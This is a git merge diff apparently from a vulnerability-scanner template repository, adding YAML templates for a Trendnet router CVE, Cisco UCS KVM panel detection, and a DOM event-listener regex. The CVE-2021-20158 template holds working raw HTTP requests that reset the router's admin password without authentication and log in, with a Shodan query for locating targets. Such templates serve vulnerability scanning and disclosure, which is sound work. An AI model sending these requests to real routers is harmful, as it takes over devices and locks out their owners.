Merge branch 'projectdiscovery:master' into master

2022-02-06 17:28:15 +08:00 · 2022-02-06 17:28:15 +08:00 · 4ab6524b2b
parent fa45badbeb bba246646a
commit 4ab6524b2b
3 changed files with 84 additions and 6 deletions
--- a/cves/2021/CVE-2021-20158.yaml
+++ b/cves/2021/CVE-2021-20158.yaml
@ -0,0 +1,51 @@
+id: CVE-2021-20158
+
+info:
+  name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
+  author: gy741
+  severity: critical
+  description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
+  reference:
+    - https://www.tenable.com/security/research/tra-2021-54
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-20158
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.html:"TEW-827DRU"
+  tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos
+
+requests:
+  - raw:
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - 'setConnectDevice'
+          - 'setInternet'
+          - 'setWlanSSID'
+          - 'TEW-827DRU'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
--- a/exposed-panels/cisco/cisco-ucs-kvm-login.yaml
+++ b/exposed-panels/cisco/cisco-ucs-kvm-login.yaml
@ -0,0 +1,27 @@
+id: cisco-ucs-kvm-login
+
+info:
+  name: Cisco UCS KVM Login
+  author: idealphase
+  severity: info
+  description: The KVM console is an interface accessible from the Cisco UCS Manager GUI or the KVM Launch Manager that emulates a direct KVM connection. Unlike the KVM dongle, which requires you to be physically connected to the server, the KVM console allows you to connect to the server from a remote location across the network.
+  reference: https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html
+  metadata:
+    shodan-query: 'http.title:"Cisco UCS KVM Direct"'
+  tags: panel,cisco,ucs,kvm
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Cisco UCS KVM Direct</title>'
+
+      - type: status
+        status:
+          - 200
--- a/miscellaneous/addeventlistener-detect.yaml
+++ b/miscellaneous/addeventlistener-detect.yaml
@ -1,8 +1,8 @@
 id: addeventlistener-detect

 info:
-  name: AddEventlistener detection
-  author: yavolo
+  name: DOM EventListener detection
+  author: yavolo,dwisiswant0
  severity: info
  tags: xss,misc
  reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
@ -10,10 +10,10 @@ info:
 requests:
  - method: GET
    path:
-      - '{{BaseURL}}'
+      - "{{BaseURL}}"

    matchers:
-      - type: word
+      - type: regex
        part: body
-        words:
-          - 'window.addEventListener('
+        regex:
+          - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118